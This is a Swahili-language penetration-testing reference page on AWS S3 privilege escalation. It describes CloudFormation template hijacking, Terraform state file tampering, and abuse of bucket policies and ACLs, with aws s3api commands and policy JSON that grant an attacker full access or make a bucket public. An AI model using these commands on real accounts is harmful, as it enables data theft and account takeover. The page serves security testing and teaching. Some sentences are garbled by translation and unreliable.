AWS - S3 Privesc

Reading time: 6 minutes

S3

s3:PutBucketNotification, s3:PutObject, s3:GetObject

Mshambuliaji mwenye ruhusa hizo juu ya ndoo za kuvutia anaweza kuwa na uwezo wa kuiba rasilimali na kupandisha mamlaka.

Kwa mfano, mshambuliaji mwenye ruhusa hizo juu ya ndoo ya cloudformation inayoitwa "cf-templates-nohnwfax6a6i-us-east-1" ataweza kuiba utekelezaji. Ufikiaji unaweza kutolewa kwa sera ifuatayo:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:PutBucketNotification",
"s3:GetBucketNotification",
"s3:PutObject",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::cf-templates-*/*",
"arn:aws:s3:::cf-templates-*"
]
},
{
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}

Na utekaji ni wawezekana kwa sababu kuna dirisha dogo la muda kutoka wakati template inapoupoload hadi kwenye bucket hadi wakati template inatekelezwa. Mshambuliaji anaweza tu kuunda lambda function katika akaunti yake ambayo itakuwa inachochewa wakati arifa ya bucket inatumwa, na kuhujumu maudhui ya bucket hiyo.

Moduli ya Pacu cfn__resouce_injection inaweza kutumika kuendesha shambulio hili.
Kwa maelezo zaidi angalia utafiti wa asili: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/

s3:PutObject, s3:GetObject

Hizi ni ruhusa za kupata na kupakia vitu kwenye S3. Huduma kadhaa ndani ya AWS (na nje yake) hutumia uhifadhi wa S3 kuhifadhi faili za usanidi.
Mshambuliaji mwenye ufikiaji wa kusoma anaweza kupata taarifa nyeti kwenye hizo.
Mshambuliaji mwenye ufikiaji wa kuandika anaweza kubadilisha data ili kutumia huduma fulani na kujaribu kupandisha mamlaka.
Hizi ni baadhi ya mifano:

• Ikiwa mfano wa EC2 unahifadhi data ya mtumiaji kwenye bucket ya S3, mshambuliaji anaweza kuibadilisha ili kutekeleza msimbo wowote ndani ya mfano wa EC2.

s3:PutObject, s3:GetObject (hiari) juu ya faili ya hali ya terraform

Ni kawaida sana kwamba faili za terraform za hali zinahifadhiwa kwenye uhifadhi wa blob wa watoa huduma wa wingu, mfano AWS S3. Kiambishi cha faili kwa faili ya hali ni .tfstate, na majina ya bucket mara nyingi pia yanaonyesha kuwa yana faili za hali za terraform. Kawaida, kila akaunti ya AWS ina bucket moja kama hiyo kuhifadhi faili za hali zinazoonyesha hali ya akaunti.
Pia kawaida, katika akaunti za ulimwengu halisi karibu kila wakati waendelezaji wote wana s3:* na wakati mwingine hata watumiaji wa biashara wana s3:Put*.

Hivyo, ikiwa una ruhusa zilizoorodheshwa juu ya faili hizi, kuna njia ya shambulio inayokuruhusu kupata RCE katika pipeline kwa mamlaka ya terraform - mara nyingi AdministratorAccess, ikifanya wewe kuwa admin wa akaunti ya wingu. Pia, unaweza kutumia njia hiyo kufanya shambulio la kukataa huduma kwa kufanya terraform ifute rasilimali halali.

Fuata maelezo katika sehemu ya Kuhujumu Faili za Hali za Terraform ya ukurasa wa Usalama wa Terraform kwa msimbo wa matumizi moja kwa moja:

Abusing Terraform State Files

s3:PutBucketPolicy

Mshambuliaji, ambaye anahitaji kuwa kutoka akaunti hiyo hiyo, ikiwa sivyo kosa Njia iliyoainishwa hairuhusiwi itachochewa, kwa ruhusa hii atakuwa na uwezo wa kujipa ruhusa zaidi juu ya bucket(s) akimruhusu kusoma, kuandika, kubadilisha, kufuta na kufichua buckets.

# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and mantaining some previous root access
{
"Id": "Policy1568185116930",
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:root"
},
"Action":"s3:ListBucket",
"Resource":"arn:aws:s3:::somebucketname"
},
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:user/username"
},
"Action":"s3:*",
"Resource":"arn:aws:s3:::somebucketname/*"
}
]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
"Id": "Policy1568185116930",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1568184932403",
"Action": [
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome",
"Principal": "*"
},
{
"Sid": "Stmt1568185007451",
"Action": [
"s3:GetObject"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome/*",
"Principal": "*"
}
]
}

s3:GetBucketAcl, s3:PutBucketAcl

Mshambuliaji anaweza kutumia ruhusa hizi kumpatia ufikiaji zaidi juu ya makundi maalum.
Kumbuka kwamba mshambuliaji hatahitaji kuwa kutoka kwenye akaunti ile ile. Zaidi ya hayo, ufikiaji wa kuandika

# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectAcl

Mshambuliaji anaweza kutumia ruhusa hizi kuongeza ufikiaji wake juu ya vitu maalum ndani ya ndoo.

# Update bucket object ACL
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectVersionAcl

Mshambuliaji mwenye ruhusa hizi anatarajiwa kuwa na uwezo wa kuweka Acl kwa toleo maalum la kitu.

aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json